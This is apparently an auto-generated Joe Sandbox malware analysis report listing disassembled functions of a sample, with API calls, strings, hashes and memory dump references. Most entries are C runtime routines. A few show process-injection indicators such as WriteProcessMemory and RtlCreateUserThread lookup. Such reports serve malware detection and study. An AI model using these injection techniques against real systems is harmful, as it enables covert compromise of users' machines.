Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
Instruction ID: 8a37928041284c8a434aeccdd4db6f983c568c8f0cf3e4f2934023fa32f313ab
Opcode Fuzzy Hash: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
Instruction Fuzzy Hash: C321A171B0154146EE296279865D33B10019B9A374F284E379A3DA73E0DEFECCC2830E

Function 006B12A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 006B12CA

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

_snprintf.LIBCMT ref: 006B12E9

Part of subcall function 006BD57C: _errno.LIBCMT ref: 006BD5B3
Part of subcall function 006BD57C: _invalid_parameter_noinfo.LIBCMT ref: 006BD5BE

remove.LIBCMT ref: 006B12F5
remove.LIBCMT ref: 006B12FC

Strings

%s\%s, xrefs: 006B12CF

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
String ID: %s\%s
API String ID: 1896346573-4073750446
Opcode ID: 116c8ba16e338bd99988bf90a74e2fe71a7e1b136674968703a12a75dd4b6793
Instruction ID: a394265970c51031fbe16b5fdcb41162b97204891c97e9a63d580db49f297bc9
Opcode Fuzzy Hash: 116c8ba16e338bd99988bf90a74e2fe71a7e1b136674968703a12a75dd4b6793
Instruction Fuzzy Hash: 0AF0BEA6604B90D5D240AB12B8103EAB362E789FD0F584535FF881BB1ADE38C5918B88

Function 0351BEBB Relevance: 7.8, APIs: 6, Instructions: 347COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03523B83: malloc.LIBCMT ref: 03523B9F

malloc.LIBCMT ref: 0351BF65

Part of subcall function 0352C60F: _FF_MSGBANNER.LIBCMT ref: 0352C63F
Part of subcall function 0352C60F: _NMSG_WRITE.LIBCMT ref: 0352C649
Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C67D
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C688
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C693

Part of subcall function 0352BE7F: malloc.LIBCMT ref: 0352BECF

Part of subcall function 0352BE7F: realloc.LIBCMT ref: 0352BEDE

malloc.LIBCMT ref: 0351C057
_snprintf.LIBCMT ref: 0351C0D5
_snprintf.LIBCMT ref: 0351C0FD
_snprintf.LIBCMT ref: 0351C124
free.LIBCMT ref: 0351C292

Part of subcall function 0352875B: malloc.LIBCMT ref: 0352878F
Part of subcall function 0352875B: free.LIBCMT ref: 03528946

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
String ID:
API String ID: 2667508507-0
Opcode ID: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
Instruction ID: b00e5ec91cdf18fdf3bcf9eb837e254f3e43094a0f43e2ee32ca77aaa5dc4053
Opcode Fuzzy Hash: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
Instruction Fuzzy Hash: 84A1A6387047164BEB58FFB4A89567E77F1FBD9200F44442D984ACB2F0EE39D9158682

Function 0351FDD3 Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 03523B83: malloc.LIBCMT ref: 03523B9F

Part of subcall function 0352D9A7: _errno.LIBCMT ref: 0352D8FE
Part of subcall function 0352D9A7: _invalid_parameter_noinfo.LIBCMT ref: 0352D909

fseek.LIBCMT ref: 0351FE6F

Part of subcall function 0352E22B: _errno.LIBCMT ref: 0352E253
Part of subcall function 0352E22B: _invalid_parameter_noinfo.LIBCMT ref: 0352E25E

_ftelli64.LIBCMT ref: 0351FE77

Part of subcall function 0352E29F: _errno.LIBCMT ref: 0352E2BD
Part of subcall function 0352E29F: _invalid_parameter_noinfo.LIBCMT ref: 0352E2C8

fseek.LIBCMT ref: 0351FE87

Part of subcall function 0352E22B: _fseek_nolock.LIBCMT ref: 0352E27C

malloc.LIBCMT ref: 0351FEC7

Part of subcall function 0352C60F: _FF_MSGBANNER.LIBCMT ref: 0352C63F
Part of subcall function 0352C60F: _NMSG_WRITE.LIBCMT ref: 0352C649
Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C67D
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C688
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C693

fclose.LIBCMT ref: 0351FF84

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
String ID:
API String ID: 2887643383-0
Opcode ID: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
Instruction ID: dd1d7ebfec4c575d578d18c1ca9f6a026f0983939e6baf6b645687c5550678e0
Opcode Fuzzy Hash: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
Instruction Fuzzy Hash: B251E535718B184FD749EB2CB49567A76E1FBC9300B40466EE48BC72A5EE389D0287C2

Function 0353764F Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 0353767C

Part of subcall function 03531153: _FF_MSGBANNER.LIBCMT ref: 03531170
Part of subcall function 03531153: _NMSG_WRITE.LIBCMT ref: 0353117A

_lock.LIBCMT ref: 0353768F
_lock.LIBCMT ref: 035376EA
_calloc_crt.LIBCMT ref: 035377A1

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _lock$_calloc_crt_mtinitlocknum
String ID:
API String ID: 3962633935-0
Opcode ID: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
Instruction ID: 68e9a9aaa306afdd347fef91a95d8db749b4943238b25ff501a98461c7c8cd59
Opcode Fuzzy Hash: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
Instruction Fuzzy Hash: 3451D3B1928F498BD718DF28E885265B7E0FB89310F15469DD88AC7275EB74D842CBC2

Function 03514937 Relevance: 7.7, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03514981

Part of subcall function 0352C60F: _FF_MSGBANNER.LIBCMT ref: 0352C63F
Part of subcall function 0352C60F: _NMSG_WRITE.LIBCMT ref: 0352C649
Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C67D
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C688
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C693

malloc.LIBCMT ref: 0351498C

Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C6A3
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C6A8

free.LIBCMT ref: 03514A73
free.LIBCMT ref: 03514A7B
free.LIBCMT ref: 03514A87
free.LIBCMT ref: 03514A94

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
Instruction ID: ec7fa31ff7b016b86f6cd3cfa04004eca69d9e2b9f192fee70101925ef541b1c
Opcode Fuzzy Hash: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
Instruction Fuzzy Hash: 7941267530CB1E4FE729EA2DA84253B76EAFBD6210B05553DD887C3262EE20D8178785

Function 0352DFE4 Relevance: 7.7, APIs: 5, Instructions: 169COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0352DEDE
memcpy_s.LIBCMT ref: 0352DFA3
_fileno.LIBCMT ref: 0352E00E

Part of subcall function 03532D5B: _errno.LIBCMT ref: 03532D64
Part of subcall function 03532D5B: _invalid_parameter_noinfo.LIBCMT ref: 03532D6F

Part of subcall function 0353423F: __doserrno.LIBCMT ref: 03534279
Part of subcall function 0353423F: _errno.LIBCMT ref: 03534280

_filbuf.LIBCMT ref: 0352E03C
_errno.LIBCMT ref: 0352E08C

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
String ID:
API String ID: 1812282339-0
Opcode ID: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
Instruction ID: 87588fb4d0b81a11513b7e89f730b3f7af5efe3cae33947e4ae1a08772f44ed5
Opcode Fuzzy Hash: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
Instruction Fuzzy Hash: 7941E73172CB294B972CDA2C7446139BBE1F7D6720B59072ED4AAC32F1DE20D85342C5

Function 0352F697 Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 0352F6B4

Part of subcall function 03532D5B: _errno.LIBCMT ref: 03532D64
Part of subcall function 03532D5B: _invalid_parameter_noinfo.LIBCMT ref: 03532D6F

_errno.LIBCMT ref: 0352F6C4

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

_errno.LIBCMT ref: 0352F6E0
_isatty.LIBCMT ref: 0352F741
_getbuf.LIBCMT ref: 0352F74D

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
String ID:
API String ID: 304646821-0
Opcode ID: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
Instruction ID: 3d69e509b782ebee5b5168c4e686f05d208af7f38cded53b0f6be93700290c79
Opcode Fuzzy Hash: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
Instruction Fuzzy Hash: A341BF31214B294FCB58EF28E4916267BF0FB8A310B580A99D85ACB2F6D774D841C7C1

Function 03526C53 Relevance: 7.6, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03526C82

Part of subcall function 0352C60F: _FF_MSGBANNER.LIBCMT ref: 0352C63F
Part of subcall function 0352C60F: _NMSG_WRITE.LIBCMT ref: 0352C649
Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C67D
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C688
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C693

_snprintf.LIBCMT ref: 03526C9A

Part of subcall function 0352C9C3: _errno.LIBCMT ref: 0352C9FA
Part of subcall function 0352C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0352CA05

free.LIBCMT ref: 03526CB1

Part of subcall function 0352C5CF: _errno.LIBCMT ref: 0352C5EF

malloc.LIBCMT ref: 03526D01
_snprintf.LIBCMT ref: 03526D19
free.LIBCMT ref: 03526D41

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
String ID:
API String ID: 761449704-0
Opcode ID: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
Instruction ID: c6ca6f99c83a863ed248038e2ef798e8070e4f1db1acb4da57ed0926a5b66335
Opcode Fuzzy Hash: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
Instruction Fuzzy Hash: E531813170CA5C0FD769FB2C78152B87BE2F78E210745829DD08ED32A6DE64AD5287C6

Function 006BE56C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006BE5A4

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

_invalid_parameter_noinfo.LIBCMT ref: 006BE5AF
_flush.LIBCMT ref: 006BE661
_fileno.LIBCMT ref: 006BE682
_flsbuf.LIBCMT ref: 006BE6C5

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1640621425-0
Opcode ID: f730a263443016ae00e5d3abb777c2b5d75680efc34748d8f50c96e33ab9094d
Instruction ID: abb642a2890e06ce77506ea3c5a4f2a45c2a1539047df8c1de81d5d2a4ceaaa7
Opcode Fuzzy Hash: f730a263443016ae00e5d3abb777c2b5d75680efc34748d8f50c96e33ab9094d
Instruction Fuzzy Hash: A8313BB230075046DE389E6359446EAB753F764FE4F188234DF6647B91FA7AD4C28304

Function 006A54F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 006A553A

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

malloc.LIBCMT ref: 006A5545

Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD25C
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD261

free.LIBCMT ref: 006A562C
free.LIBCMT ref: 006A5634
free.LIBCMT ref: 006A5640
free.LIBCMT ref: 006A564D

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: d59479e3761b4ed4932fddf4fcb50f7cb5c8a88df08afafcd930e07321553fd4
Instruction ID: 0c2070a5c1fa609bf64208da1799ee51ca9a2a0590a55fbaa69971dd2a3a5602
Opcode Fuzzy Hash: d59479e3761b4ed4932fddf4fcb50f7cb5c8a88df08afafcd930e07321553fd4
Instruction Fuzzy Hash: 40316B62310BC556DB05EB2AA8007AE6B57F79ABC8F885034DD168B715FE3ACC47CB00

Function 006C8B58 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006C8BBA
_isleadbyte_l.LIBCMT ref: 006C8BEA
MultiByteToWideChar.KERNEL32 ref: 006C8C29
MultiByteToWideChar.KERNEL32 ref: 006C8C77
_errno.LIBCMT ref: 006C8C81

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: bf73e22792d62dbb2a5a8665747f634ed6f1a0b77ca2749cdd90391f7f3d2e71
Instruction ID: e58d9671321d565acd5753379fff97564b17bb89b3e5a4fe9be7f2f5189da542
Opcode Fuzzy Hash: bf73e22792d62dbb2a5a8665747f634ed6f1a0b77ca2749cdd90391f7f3d2e71
Instruction Fuzzy Hash: 053192722157808ADB708F15E590BB9BBA6FB95FC4F18412AEB8957B69CF38C841C700

Function 0351ECE3 Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0351ED04

Part of subcall function 0352C60F: _FF_MSGBANNER.LIBCMT ref: 0352C63F
Part of subcall function 0352C60F: _NMSG_WRITE.LIBCMT ref: 0352C649
Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C67D
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C688
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C693

free.LIBCMT ref: 0351ED3F
fwrite.LIBCMT ref: 0351ED80
fclose.LIBCMT ref: 0351ED88
free.LIBCMT ref: 0351ED95

Part of subcall function 0352C5CF: _errno.LIBCMT ref: 0352C5EF

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$free$_callnewhfclosefwritemalloc
String ID:
API String ID: 1696598829-0
Opcode ID: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
Instruction ID: f0dfaebcb245fec9b0d7f6f21cb272abd25fa06b122f3cc252771b7c3d1296fb
Opcode Fuzzy Hash: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
Instruction Fuzzy Hash: D7219F25728F194FD788FB2CA45576E76F1FBD8210F48052DA44AC72E4ED28C9018386

Function 035378F3 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03537904

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

__doserrno.LIBCMT ref: 035378FC

Part of subcall function 0352EFA3: _getptd_noexit.LIBCMT ref: 0352EFA7

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction ID: 6d66d73cedd6a196bde1b23a64cab90764b434b9990c95f6477d10f0f25a0ea5
Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction Fuzzy Hash: 41F022B5929A1A4ED718EB28F8803A43BB0FF8B33AF544388C00ACF1F0C77804408312

Function 006C84AC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006C84BD

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

__doserrno.LIBCMT ref: 006C84B5

Part of subcall function 006BFB5C: _getptd_noexit.LIBCMT ref: 006BFB60

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction ID: 22deb29eb9f92355b7272f893d5b966c34989eeb57d4f55a19c4779abf9ac5d9
Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction Fuzzy Hash: 70F0F6F26116858ADE592F68C8A177C3693DBA0B32F91872DD639073E1CFBC44458319

Function 006AD584 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE

Download Yara Rule

Strings

%s!%s, xrefs: 006AD733

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID: %s!%s
API String ID: 0-2935588013
Opcode ID: 87c3d06f94ebd67ad8421af21f0b978c410073bf873a78430363920c94c161ce
Instruction ID: 721a46e221e287db2f0c9d255b99014c1cb840c8e3ebbc716e474a2802b01592
Opcode Fuzzy Hash: 87c3d06f94ebd67ad8421af21f0b978c410073bf873a78430363920c94c161ce
Instruction Fuzzy Hash: 2B51AF7A60064086DB24EF61D040BA97362F38AF94F448126EF8F47B08DF38DD82CB14

Function 006BC178 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 006BC20D
LookupAccountSidA.ADVAPI32 ref: 006BC252
_snprintf.LIBCMT ref: 006BC27A

Strings

%s\%s, xrefs: 006BC268

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AccountInformationLookupToken_snprintf
String ID: %s\%s
API String ID: 2107350476-4073750446
Opcode ID: eab80e5e76cae2f62ff1f8dbdd5d2f372e8e47681e9448c49ff6034cb1a03876
Instruction ID: a852ce849c5b8018b6accd2d1348ed450959630e5b8dfa56bcffc082ae8aef5c
Opcode Fuzzy Hash: eab80e5e76cae2f62ff1f8dbdd5d2f372e8e47681e9448c49ff6034cb1a03876
Instruction Fuzzy Hash: 3F216F76204FC196DB20CF61E8447DA73A9F788B98F448126EA8D57B18DF39C349CB40

Function 006B22A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64injectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 006B22E6

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

WriteProcessMemory.KERNEL32 ref: 006B2354
free.LIBCMT ref: 006B236A

Strings

@, xrefs: 006B2329

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$AllocHeapMemoryProcessWrite_callnewhfreemalloc
String ID: @
API String ID: 2776329143-2766056989
Opcode ID: f16ef9615b18e5dd8738061e84ba1a26569ff2d2e873f0e2120eda13e1fc476a
Instruction ID: 797924fe7ebd3909b0cb377baf654928ada1f02ccb543529d30cab556c83e017
Opcode Fuzzy Hash: f16ef9615b18e5dd8738061e84ba1a26569ff2d2e873f0e2120eda13e1fc476a
Instruction Fuzzy Hash: A1215672704B4096DA21CF16F85069ABBA5F7C8F80F894529AF8C87B24DF3CC192C744

Function 006B2B60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006B2B8A
GetProcAddress.KERNEL32 ref: 006B2B9A

Strings

RtlCreateUserThread, xrefs: 006B2B90
ntdll.dll, xrefs: 006B2B77

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
